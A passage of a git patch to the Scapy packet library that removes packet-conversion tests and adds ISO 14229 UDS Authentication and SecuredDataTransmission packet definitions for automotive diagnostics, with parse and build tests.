a/test/packet.uts b/test/packet.uts deleted file mode 100644 index cd6c944d647..00000000000 --- a/test/packet.uts +++ /dev/null @@ -1,299 +0,0 @@ -% Regression tests for Scapy packets - -+ Test packet conversion (convert_to/convert_packet) - -= Setup packet conversion - -def expect_exception(e, c): - try: - c() - return False - except e: - return True - -def no_theme(c): - old_theme = conf.color_theme - conf.color_theme = NoTheme() - try: - return c() - finally: - conf.color_theme = old_theme - -# PacketA declares no conversions, but will have conversions declared by -# PacketB. -class PacketA(Packet): - name = 'PacketA' - fields_desc = [LEShortField('foo', None)] - -# PacketB declares conversions for PacketA -class PacketB(Packet): - name = 'PacketB' - fields_desc = [ShortField('bar', None)] - def convert_to(self, other_cls, **kwargs): - if other_cls is PacketA: - return PacketA(foo=self.bar) - return Packet.convert_to(self, other_cls, **kwargs) - @classmethod - def convert_packet(cls, pkt, **kwargs): - if isinstance(pkt, PacketA): - return cls(bar=pkt.foo) - return Packet.convert_packet(pkt, **kwargs) - -# PacketC has no defined conversions, either way. -# Converting to or from it should fail. -class PacketC(Packet): - name = 'PacketC' - fields_desc = [IntField('x', None),] - -# Packet D stacks Packet C under it. -class PacketD(Packet): - name = 'PacketD' - fields_desc = [ShortField('version', 12),] - -bind_layers(PacketD, PacketC) - -= Check formatting is expected. - -# This isn't strictly relevant for the test, but it ensures that we have the -# environment we expected. - -p = PacketA(b'\xd2\x04') -assert p.foo == 1234 - -p = PacketB(b'\x04\xd2') -assert p.bar == 1234 - -p = PacketC(b'\0\0\x04\xd2') -assert p.x == 1234 - -p = PacketD(b'\0\x0c\0\0\x04\xd2') -assert p.version == 12 -assert p.haslayer(PacketC) -assert p.x == 1234 - -p = PacketA(foo=1234) -assert raw(p) == b'\xd2\x04' - -p = PacketB(raw(p)) -assert p.bar == 53764 - -p = PacketB(bar=1234) -assert raw(p) == b'\x04\xd2' - -p = PacketA(raw(p)) -assert p.foo == 53764 - -p = PacketC(x=1234) -assert raw(p) == b'\0\0\x04\xd2' - -p = PacketD()/PacketC(x=1234) -assert raw(p) == b'\0\x0c\0\0\x04\xd2' - -= convert_to A -> B - -p1 = PacketA(foo=1234) -p2 = p1.convert_to(PacketB) - -assert p1.foo == 1234 -assert p2.bar == 1234 - -= convert_to A -> C (fails) - -p1 = PacketA(foo=1234) -expect_exception(TypeError, lambda: p1.convert_to(PacketC)) - -assert p1.foo == 1234 - -= convert_to A -> Raw - -p1 = PacketA(foo=1234) -p2 = p1.convert_to(Raw) - -assert p1.foo == 1234 -assert isinstance(p2, Raw) -assert p2.load == b'\xd2\x04' - -= convert_to B -> A - -p1 = PacketB(bar=1234) -p2 = p1.convert_to(PacketA) - -assert p1.bar == 1234 -assert p2.foo == 1234 - -= convert_to B -> C (fails) - -p1 = PacketB(bar=1234) -expect_exception(TypeError, lambda: p1.convert_to(PacketC)) - -assert p1.bar == 1234 - -= convert_to B -> Raw - -p1 = PacketB(bar=1234) -p2 = p1.convert_to(Raw) - -assert p1.bar == 1234 -assert isinstance(p2, Raw) -assert p2.load == b'\x04\xd2' - -= convert_to D -> C (fails) - -p1 = PacketD()/PacketC(x=1234) -expect_exception(TypeError, lambda: p1.convert_to(PacketC)) - -assert p1.x == 1234 - -= convert_to invalid type - -try: - PacketA().convert_to(3) -except TypeError: - pass -else: - assert False - -= convert_packet A -> B - -p1 = PacketA(foo=1234) -p2 = PacketB.convert_packet(p1) - -assert p1.foo == 1234 -assert p2.bar == 1234 - -= convert_packet A -> C (fails) - -p1 = PacketA(foo=1234) -expect_exception(TypeError, lambda: PacketC.convert_packet(p1)) - -assert p1.foo == 1234 - -= convert_packet A -> Raw - -p1 = PacketA(foo=1234) -p2 = Raw.convert_packet(p1) - -assert p1.foo == 1234 -assert isinstance(p2, Raw) -assert p2.load == b'\xd2\x04' - -= convert_packet B -> A - -p1 = PacketB(bar=1234) -p2 = PacketA.convert_packet(p1) - -assert p1.bar == 1234 -assert p2.foo == 1234 - -= convert_packet B -> C (fails) - -p1 = PacketB(bar=1234) -expect_exception(TypeError, lambda: PacketC.convert_packet(p1)) - -assert p1.bar == 1234 - -= convert_packet B -> Raw - -p1 = PacketB(bar=1234) -p2 = Raw.convert_packet(p1) - -assert p1.bar == 1234 -assert isinstance(p2, Raw) -assert p2.load == b'\x04\xd2' - -= convert_packet D -> C (fails) - -p1 = PacketD()/PacketC(x=1234) -expect_exception(TypeError, lambda: PacketC.convert_packet(p1)) - -assert p1.x == 1234 - -= convert_packets A -> B - -p1 = [PacketA(foo=x) for x in range(100)] -p2 = list(PacketB.convert_packets(p1)) - -for x in range(100): - assert p1[x].foo == x - assert p2[x].bar == x - -= convert_packets B -> A - -p1 = [PacketB(bar=x) for x in range(100)] -p2 = list(PacketA.convert_packets(p1)) - -for x in range(100): - assert p1[x].bar == x - assert p2[x].foo == x - -= convert_packet invalid type - -try: - PacketA.convert_packet(3) -except TypeError: - pass -else: - assert False - -= PacketList.convert_to A -> B - -pl1 = PacketList([PacketA(foo=x) for x in range(10)]) -pl2 = pl1.convert_to(PacketB) - -for i, p2 in enumerate(pl2): - assert p2.bar == i - -assert 'PacketB' in pl2.listname - -= PacketList.convert_to custom name / stats - -pl1 = PacketList( - [PacketA(foo=x) for x in range(10)], name='my old list', stats=[PacketA]) -assert pl1.listname == 'my old list' - -pl2 = pl1.convert_to(PacketB, name='my new list', stats=[PacketB, PacketC]) - -for i, p2 in enumerate(pl2): - assert p2.bar == i - -assert pl2.listname == 'my new list' - -assert no_theme(lambda: 'PacketA' not in str(pl2)) -assert no_theme(lambda: 'PacketB:10' in str(pl2)) - -= PacketList.getlayer - -pl1 = PacketList([PacketC(x=x)/PacketD(version=x*2) for x in range(10)]) -pl2 = pl1.getlayer(PacketD) - -for i, p2 in enumerate(pl2): - assert p2.version == i * 2 - -assert 'PacketD' in pl2.listname - -= PacketList.getlayer custom name / stats - -pl1 = PacketList( - [PacketC(x=x)/PacketD(version=x*2) for x in range(10)], - name='old list', stats=[PacketC]) -pl2 = pl1.getlayer(PacketD, name='new list', stats=[PacketD]) - -for i, p2 in enumerate(pl2): - assert p2.version == i * 2 - -assert pl2.listname == 'new list' -assert no_theme(lambda: 'PacketC' not in str(pl2)) -assert no_theme(lambda: 'PacketD:10' in str(pl2)) - -= PacketList.getlayer filtering - -pl1 = PacketList([PacketC(x=x)/PacketD(version=x*2) for x in range(10)]) -pl2 = pl1.getlayer(PacketD, nb=1, flt={'version': 6}) - -assert len(pl2) == 1 -assert pl2[0].version == 6 - -= PacketList.getlayer filtering with 0 results - -pl2 = pl1.getlayer(PacketD, nb=1, flt={'version': 1}) -assert len(pl2) == 0 diff --git a/test/pipetool.uts b/test/pipetool.uts index 32dde758d69..c1673b25f99 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -85,7 +85,7 @@ assert len(b.high_sources) == 1 a b -a = AutoSource() +a = Sink() b = AutoSource() a << b assert len(a.high_sinks) == 0 @@ -95,16 +95,16 @@ assert len(b.high_sources) == 0 a b -a = AutoSource() -b = AutoSource() -a == b +a = Sink() +b = Sink() +a % b assert len(a.sinks) == 1 assert len(a.sources) == 1 assert len(b.sinks) == 1 assert len(b.sources) == 1 -a = AutoSource() -b = AutoSource() +a = Sink() +b = Sink() a//b assert len(a.high_sinks) == 1 assert len(a.high_sources) == 1 @@ -112,7 +112,7 @@ assert len(b.high_sinks) == 1 assert len(b.high_sources) == 1 a = AutoSource() -b = AutoSource() +b = Sink() a^b assert len(b.trigger_sources) == 1 assert len(a.trigger_sinks) == 1 @@ -722,66 +722,3 @@ p.stop() assert result.startswith(b"HTTP/1.1 200 OK") -= Packet conversion (ConvertPipe) - -class PacketA(Packet): - fields_desc = [LEShortField('foo', None)] - -class PacketB(Packet): - fields_desc = [ShortField('bar', None)] - def convert_to(self, other_cls, **kwargs): - if other_cls is PacketA: - return PacketA(foo=self.bar) - return Packet.convert_to(self, other_cls, **kwargs) - @classmethod - def convert_packet(cls, pkt, **kwargs): - if isinstance(pkt, PacketA): - return cls(bar=pkt.foo) - return Packet.convert_packet(pkt, **kwargs) - -p = PipeEngine() -s = CLIFeeder() -sh = CLIHighFeeder() -c = ConvertPipe(low_type=PacketA) -d = QueueSink() - -s > c > d -sh >> c >> d - -p.add(s) -p.start() - -# QueueSink puts all packets in the same queue, and this can race on Windows -s.send(PacketB(bar=1234)) -r0 = d.q.get(timeout=5) - -sh.send(PacketB(bar=1234)) -r1 = d.q.get(timeout=5) -p.stop() - -# Debug info -r0, raw(r0) -r1, raw(r1) - -assert raw(r0) == b'\xd2\x04' -assert raw(r1) == b'\x04\xd2' -assert isinstance(r0, PacketA) -assert isinstance(r1, PacketB) - -# Try converting on high -c.high_type = PacketB -c.low_type = None - -p.start() -s.send(PacketA(foo=1234)) -r0 = d.q.get(timeout=5) -sh.send(PacketA(foo=1234)) -r1 = d.q.get(timeout=5) -p.stop() - -r0, raw(r0) -r1, raw(r1) -assert raw(r0) == b'\xd2\x04' -assert raw(r1) == b'\x04\xd2' -assert isinstance(r0, PacketA) -assert isinstance(r1, PacketB) From 5cbeccab225bdc6ddc84d4676dcbc3381a1a5276 Mon Sep 17 00:00:00 2001 From: ~sig Date: Fri, 19 Nov 2021 10:52:06 +0100 Subject: [PATCH 0689/1632] uds.py: add basic AuthenticationService and more details to SecuredDataTransmission from ISO 14229-1:2020 (#3440) * [UDS] add AuthenticationService and more details to SecuredDataTransmission from ISO 14229-1:2020 * UDS: test and fix build with FieldLenField --- scapy/contrib/automotive/uds.py | 199 +++++++++++++++- test/contrib/automotive/uds.uts | 398 +++++++++++++++++++++++++++++++- 2 files changed, 586 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 479ec72c771..7bf4740bea3 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -13,7 +13,7 @@ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ ShortField, ObservableDict, XShortEnumField, XByteEnumField, StrLenField, \ - FieldLenField + FieldLenField, XStrFixedLenField, XStrLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import log_loading, log_interactive, Scapy_Exception @@ -48,6 +48,7 @@ class UDS(ISOTP): 0x24: 'ReadScalingDataByIdentifier', 0x27: 'SecurityAccess', 0x28: 'CommunicationControl', + 0x29: 'Authentication', 0x2A: 'ReadDataPeriodicIdentifier', 0x2C: 'DynamicallyDefineDataIdentifier', 0x2E: 'WriteDataByIdentifier', @@ -69,6 +70,7 @@ class UDS(ISOTP): 0x64: 'ReadScalingDataByIdentifierPositiveResponse', 0x67: 'SecurityAccessPositiveResponse', 0x68: 'CommunicationControlPositiveResponse', + 0x69: 'AuthenticationPositiveResponse', 0x6A: 'ReadDataPeriodicIdentifierPositiveResponse', 0x6C: 'DynamicallyDefineDataIdentifierPositiveResponse', 0x6E: 'WriteDataByIdentifierPositiveResponse', @@ -273,6 +275,162 @@ def answers(self, other): bind_layers(UDS, UDS_CCPR, service=0x68) +# #########################AUTH################################### +class UDS_AUTH(Packet): + subFunctions = { + 0x00: 'deAuthenticate', + 0x01: 'verifyCertificateUnidirectional', + 0x02: 'verifyCertificateBidirectional', + 0x03: 'proofOfOwnership', + 0x04: 'transmitCertificate', + 0x05: 'requestChallengeForAuthentication', + 0x06: 'verifyProofOfOwnershipUnidirectional', + 0x07: 'verifyProofOfOwnershipBidirectional', + 0x08: 'authenticationConfiguration', + 0x7F: 'ISOSAEReserved' + } + name = "Authentication" + fields_desc = [ + ByteEnumField('subFunction', 0, subFunctions), + ConditionalField(XByteField('communicationConfiguration', 0), + lambda pkt: pkt.subFunction in [0x01, 0x02, 0x5]), + ConditionalField(XShortField('certificateEvaluationId', 0), + lambda pkt: pkt.subFunction == 0x04), + ConditionalField(XStrFixedLenField('algorithmIndicator', 0, length=16), + lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), + ConditionalField(FieldLenField('lengthOfCertificateClient', None, + fmt="H", length_of='certificateClient'), + lambda pkt: pkt.subFunction in [0x01, 0x02]), + ConditionalField(XStrLenField('certificateClient', b"", + length_from=lambda p: + p.lengthOfCertificateClient), + lambda pkt: pkt.subFunction in [0x01, 0x02]), + ConditionalField(FieldLenField('lengthOfProofOfOwnershipClient', None, + fmt="H", + length_of='proofOfOwnershipClient'), + lambda pkt: pkt.subFunction in [0x03, 0x06, 0x07]), + ConditionalField(XStrLenField('proofOfOwnershipClient', b"", + length_from=lambda p: + p.lengthOfProofOfOwnershipClient), + lambda pkt: pkt.subFunction in [0x03, 0x06, 0x07]), + ConditionalField(FieldLenField('lengthOfChallengeClient', None, + fmt="H", length_of='challengeClient'), + lambda pkt: pkt.subFunction in [0x01, 0x02, 0x06, + 0x07]), + ConditionalField(XStrLenField('challengeClient', b"", + length_from=lambda p: + p.lengthOfChallengeClient), + lambda pkt: pkt.subFunction in [0x01, 0x02, 0x06, + 0x07]), + ConditionalField(FieldLenField('lengthOfEphemeralPublicKeyClient', + None, fmt="H", + length_of='ephemeralPublicKeyClient'), + lambda pkt: pkt.subFunction == 0x03), + ConditionalField(XStrLenField('ephemeralPublicKeyClient', b"", + length_from=lambda p: + p.lengthOfEphemeralPublicKeyClient), + lambda pkt: pkt.subFunction == 0x03), + ConditionalField(FieldLenField('lengthOfCertificateData', None, + fmt="H", length_of='certificateData'), + lambda pkt: pkt.subFunction == 0x04), + ConditionalField(XStrLenField('certificateData', b"", + length_from=lambda p: + p.lengthOfCertificateData), + lambda pkt: pkt.subFunction == 0x04), + ConditionalField(FieldLenField('lengthOfAdditionalParameter', None, + fmt="H", + length_of='additionalParameter'), + lambda pkt: pkt.subFunction in [0x06, 0x07]), + ConditionalField(XStrLenField('additionalParameter', b"", + length_from=lambda p: + p.lengthOfAdditionalParameter), + lambda pkt: pkt.subFunction in [0x06, 0x07]), + ] + + +bind_layers(UDS, UDS_AUTH, service=0x29) + + +class UDS_AUTHPR(Packet): + authenticationReturnParameterTypes = { + 0x00: 'requestAccepted', + 0x01: 'generalReject', + # Authentication with PKI Certificate Exchange (ACPE) + 0x02: 'authenticationConfigurationAPCE', + # Authentication with Challenge-Response (ACR) + 0x03: 'authenticationConfigurationACRWithAsymmetricCryptography', + 0x04: 'authenticationConfigurationACRWithSymmetricCryptography', + 0x05: 'ISOSAEReserved', + 0x0F: 'ISOSAEReserved', + 0x10: 'deAuthenticationSuccessful', + 0x11: 'certificateVerifiedOwnershipVerificationNecessary', + 0x12: 'ownershipVerifiedAuthenticationComplete', + 0x13: 'certificateVerified', + 0x14: 'ISOSAEReserved', + 0x9F: 'ISOSAEReserved', + 0xFF: 'ISOSAEReserved' + } + name = 'AuthenticationPositiveResponse' + fields_desc = [ + ByteEnumField('subFunction', 0, UDS_AUTH.subFunctions), + ByteEnumField('returnValue', 0, authenticationReturnParameterTypes), + ConditionalField(XStrFixedLenField('algorithmIndicator', 0, length=16), + lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), + ConditionalField(FieldLenField('lengthOfChallengeServer', None, + fmt="H", length_of='challengeServer'), + lambda pkt: pkt.subFunction in [0x01, 0x02, 0x05]), + ConditionalField(XStrLenField('challengeServer', b"", + length_from=lambda p: + p.lengthOfChallengeServer), + lambda pkt: pkt.subFunction in [0x01, 0x02, 0x05]), + ConditionalField(FieldLenField('lengthOfCertificateServer', None, + fmt="H", length_of='certificateServer'), + lambda pkt: pkt.subFunction == 0x02), + ConditionalField(XStrLenField('certificateServer', b"", + length_from=lambda p: + p.lengthOfCertificateServer), + lambda pkt: pkt.subFunction == 0x02), + ConditionalField(FieldLenField('lengthOfProofOfOwnershipServer', None, + fmt="H", + length_of='proofOfOwnershipServer'), + lambda pkt: pkt.subFunction in [0x02, 0x07]), + ConditionalField(XStrLenField('proofOfOwnershipServer', b"", + length_from=lambda p: + p.lengthOfProofOfOwnershipServer), + lambda pkt: pkt.subFunction in [0x02, 0x07]), + ConditionalField(FieldLenField('lengthOfSessionKeyInfo', None, fmt="H", + length_of='sessionKeyInfo'), + lambda pkt: pkt.subFunction in [0x03, 0x06, 0x07]), + ConditionalField(XStrLenField('sessionKeyInfo', b"", + length_from=lambda p: + p.lengthOfSessionKeyInfo), + lambda pkt: pkt.subFunction in [0x03, 0x06, 0x07]), + ConditionalField(FieldLenField('lengthOfEphemeralPublicKeyServer', + None, fmt="H", + length_of='ephemeralPublicKeyServer'), + lambda pkt: pkt.subFunction in [0x01, 0x02]), + ConditionalField(XStrLenField('ephemeralPublicKeyServer', b"", + length_from=lambda p: + p.lengthOfEphemeralPublicKeyServer), + lambda pkt: pkt.subFunction in [0x1, 0x02]), + ConditionalField(FieldLenField('lengthOfNeededAdditionalParameter', + None, fmt="H", + length_of='neededAdditionalParameter'), + lambda pkt: pkt.subFunction == 0x05), + ConditionalField(XStrLenField('neededAdditionalParameter', b"", + length_from=lambda p: + p.lengthOfNeededAdditionalParameter), + lambda pkt: pkt.subFunction == 0x05), + ] + + def answers(self, other): + return isinstance(other, UDS_AUTH) \ + and other.subFunction == self.subFunction + + +bind_layers(UDS, UDS_AUTHPR, service=0x69) + + # #########################TP################################### class UDS_TP(Packet): name = 'TesterPresent' @@ -337,10 +495,23 @@ def answers(self, other): # #########################SDT################################### +# TODO: Implement correct internal message service handling here, +# instead of using just the dataRecord class UDS_SDT(Packet): name = 'SecuredDataTransmission' fields_desc = [ - StrField('securityDataRequestRecord', b"") + BitField('requestMessage', 0, 1), + BitField('ISOSAEReservedBackwardsCompatibility', 0, 2), + BitField('preEstablishedKeyUsed', 0, 1), + BitField('encryptedMessage', 0, 1), + BitField('signedMessage', 0, 1), + BitField('signedResponseRequested', 0, 1), + BitField('ISOSAEReserved', 0, 9), + ByteField('signatureEncryptionCalculation', 0), + XShortField('signatureLength', 0), + XShortField('antiReplayCounter', 0), + ByteField('internalMessageServiceRequestId', 0), + StrField('dataRecord', b"", fmt="B") ] @@ -350,7 +521,18 @@ class UDS_SDT(Packet): class UDS_SDTPR(Packet): name = 'SecuredDataTransmissionPositiveResponse' fields_desc = [ - StrField('securityDataResponseRecord', b"") + BitField('requestMessage', 0, 1), + BitField('ISOSAEReservedBackwardsCompatibility', 0, 2), + BitField('preEstablishedKeyUsed', 0, 1), + BitField('encryptedMessage', 0, 1), + BitField('signedMessage', 0, 1), + BitField('signedResponseRequested', 0, 1), + BitField('ISOSAEReserved', 0, 9), + ByteField('signatureEncryptionCalculation', 0), + XShortField('signatureLength', 0), + XShortField('antiReplayCounter', 0), + ByteField('internalMessageServiceResponseId', 0), + StrField('dataRecord', b"", fmt="B") ] def answers(self, other): @@ -1033,7 +1215,7 @@ def _contains_file_size(packet): fields_desc = [ XByteEnumField('modeOfOperation', 0, modeOfOperations), - FieldLenField('filePathAndNameLength', 0, + FieldLenField('filePathAndNameLength', None, length_of='filePathAndName', fmt='H'), StrLenField('filePathAndName', b"", length_from=lambda p: p.filePathAndNameLength), @@ -1041,7 +1223,8 @@ def _contains_file_size(packet): lambda p: p.modeOfOperation not in [2, 5]), ConditionalField(BitField('encryptingMethod', 0, 4), lambda p: p.modeOfOperation not in [2, 5]), - ConditionalField(FieldLenField('fileSizeParameterLength', 0, fmt="B", + ConditionalField(FieldLenField('fileSizeParameterLength', None, + fmt="B", length_of='fileSizeUnCompressed'), lambda p: UDS_RFT._contains_file_size(p)), ConditionalField(StrLenField('fileSizeUnCompressed', b"", @@ -1067,7 +1250,7 @@ def _contains_data_format_identifier(packet): fields_desc = [ XByteEnumField('modeOfOperation', 0, UDS_RFT.modeOfOperations), - ConditionalField(FieldLenField('lengthFormatIdentifier', 0, + ConditionalField(FieldLenField('lengthFormatIdentifier', None, length_of='maxNumberOfBlockLength', fmt='B'), lambda p: p.modeOfOperation != 2), @@ -1078,7 +1261,8 @@ def _contains_data_format_identifier(packet): lambda p: p.modeOfOperation != 0x02), ConditionalField(BitField('encryptingMethod', 0, 4), lambda p: p.modeOfOperation != 0x02), - ConditionalField(FieldLenField('fileSizeOrDirInfoParameterLength', 0, + ConditionalField(FieldLenField('fileSizeOrDirInfoParameterLength', + None, length_of='fileSizeUncompressedOrDirInfoLength'), lambda p: p.modeOfOperation not in [1, 2, 3]), ConditionalField(StrLenField('fileSizeUncompressedOrDirInfoLength', @@ -1149,6 +1333,7 @@ class UDS_NR(Packet): 0x35: 'invalidKey', 0x36: 'exceedNumberOfAttempts', 0x37: 'requiredTimeDelayNotExpired', + 0x3A: 'secureDataVerificationFailed', 0x70: 'uploadDownloadNotAccepted', 0x71: 'transferDataSuspended', 0x72: 'generalProgrammingFailure', diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 131e7b2f3b6..221554dd9a7 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -241,6 +241,345 @@ ecu.update(cc) ecu.update(ccpr) assert ecu.state.communication_control == 1 += Check UDS_AUTH + +auth = UDS(b"\x29\x00") +assert auth.service == 0x29 +assert auth.subFunction == 0x0 + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x0) +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x00\x00") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x0 +assert authpr.returnValue == 0x0 + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x0, returnValue=0x0) +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x01\x01\x00\x01\xFF\x00\x01\xFF") +assert auth.service == 0x29 +assert auth.subFunction == 0x1 +assert auth.communicationConfiguration == 0x1 +assert auth.lengthOfCertificateClient == 0x1 +assert auth.certificateClient == b"\xFF" +assert auth.lengthOfChallengeClient == 0x1 +assert auth.challengeClient == b"\xFF" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x1, communicationConfiguration=0x1, + certificateClient=b"\xFF", challengeClient=b"\xFF") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x01\x00\x00\x01\xFF\x00\x01\xFE") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x1 +assert authpr.returnValue == 0x0 +assert authpr.lengthOfChallengeServer == 0x1 +assert authpr.challengeServer == b"\xFF" +assert authpr.lengthOfEphemeralPublicKeyServer == 0x1 +assert authpr.ephemeralPublicKeyServer == b"\xFE" + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x1, returnValue=0x0, + challengeServer=b"\xFF", + ephemeralPublicKeyServer=b"\xFE") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x02\x01\x00\x01\xFF\x00\x01\xFF") +assert auth.service == 0x29 +assert auth.subFunction == 0x2 +assert auth.communicationConfiguration == 0x1 +assert auth.lengthOfCertificateClient == 0x1 +assert auth.certificateClient == b"\xFF" +assert auth.lengthOfChallengeClient == 0x1 +assert auth.challengeClient == b"\xFF" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x2, communicationConfiguration=0x1, + certificateClient=b"\xFF", challengeClient=b"\xFF") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x02\x00\x00\x01\xFF\x00\x03\xC0\xFF\xEE\x00\x01\x56\x00" + + b"\x01\xFE") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x2 +assert authpr.returnValue == 0x0 +assert authpr.lengthOfChallengeServer == 0x1 +assert authpr.challengeServer == b"\xFF" +assert authpr.lengthOfCertificateServer == 0x3 +assert authpr.certificateServer == b"\xC0\xFF\xEE" +assert authpr.lengthOfProofOfOwnershipServer == 0x1 +assert authpr.proofOfOwnershipServer == b"\x56" +assert authpr.lengthOfEphemeralPublicKeyServer == 0x1 +assert authpr.ephemeralPublicKeyServer == b"\xFE" + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x2, returnValue=0x0, + challengeServer=b"\xFF", + certificateServer=b"\xC0\xFF\xEE", + proofOfOwnershipServer=b"\x56", + ephemeralPublicKeyServer=b"\xFE") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x03\x00\x01\xFF\x00\x02\xFF\xFE") +assert auth.service == 0x29 +assert auth.subFunction == 0x3 +assert auth.lengthOfProofOfOwnershipClient == 0x1 +assert auth.proofOfOwnershipClient == b"\xFF" +assert auth.lengthOfEphemeralPublicKeyClient == 0x2 +assert auth.ephemeralPublicKeyClient == b"\xFF\xFE" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x3, proofOfOwnershipClient=b"\xFF", + ephemeralPublicKeyClient=b"\xFF\xFE") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x03\x00\x00\x01\xFE") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x3 +assert authpr.returnValue == 0x0 +assert authpr.lengthOfSessionKeyInfo == 0x1 +assert authpr.sessionKeyInfo == b"\xFE" + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x3, returnValue=0x0, + sessionKeyInfo=b"\xFE") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x04\x00\x03\x00\x05\xFF\x00\x02\xFF\xFE") +assert auth.service == 0x29 +assert auth.subFunction == 0x4 +assert auth.certificateEvaluationId == 0x3 +assert auth.lengthOfCertificateData == 0x5 +assert auth.certificateData == b"\xFF\x00\x02\xFF\xFE" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x4, certificateEvaluationId=0x3, + certificateData=b"\xFF\x00\x02\xFF\xFE") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x04\x00") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x4 +assert authpr.returnValue == 0x0 + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x4, returnValue=0x0) +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x05\x01\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01") +assert auth.service == 0x29 +assert auth.subFunction == 0x5 +assert auth.communicationConfiguration == 0x1 +assert auth.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x5, communicationConfiguration=0x1, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00\x02" + + b"\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01")) +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x05\x00\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01\x00\x01\xFF\x00\x00") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x5 +assert authpr.returnValue == 0x0 +assert authpr.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") +assert authpr.lengthOfChallengeServer == 0x1 +assert authpr.challengeServer == b"\xFF" +assert authpr.lengthOfNeededAdditionalParameter == 0x0 +assert authpr.neededAdditionalParameter == b"" + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x5, returnValue=0x0, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00" + + b"\x02\xFF\xFE\xBE\x34" + + b"\x56\x03\xFF\xEE\x20" + + b"\x01"), + challengeServer=b"\xFF") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x06\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03\xFF" + + b"\xEE\x20\x01\x00\x01\xFF\x00\x01\xFF\x00\x00") +assert auth.service == 0x29 +assert auth.subFunction == 0x6 +assert auth.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") +assert auth.lengthOfProofOfOwnershipClient == 0x1 +assert auth.proofOfOwnershipClient == b"\xFF" +assert auth.lengthOfChallengeClient == 0x1 +assert auth.challengeClient == b"\xFF" +assert auth.lengthOfAdditionalParameter == 0x0 +assert auth.additionalParameter == b"" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x6, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00\x02" + + b"\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01"), + proofOfOwnershipClient=b"\xFF", + challengeClient=b"\xFF") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x06\x00\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01\x00\x01\xFE") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x6 +assert authpr.returnValue == 0x0 +assert auth.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") +assert authpr.lengthOfSessionKeyInfo == 0x1 +assert authpr.sessionKeyInfo == b"\xFE" + +assert authpr.answers(auth) 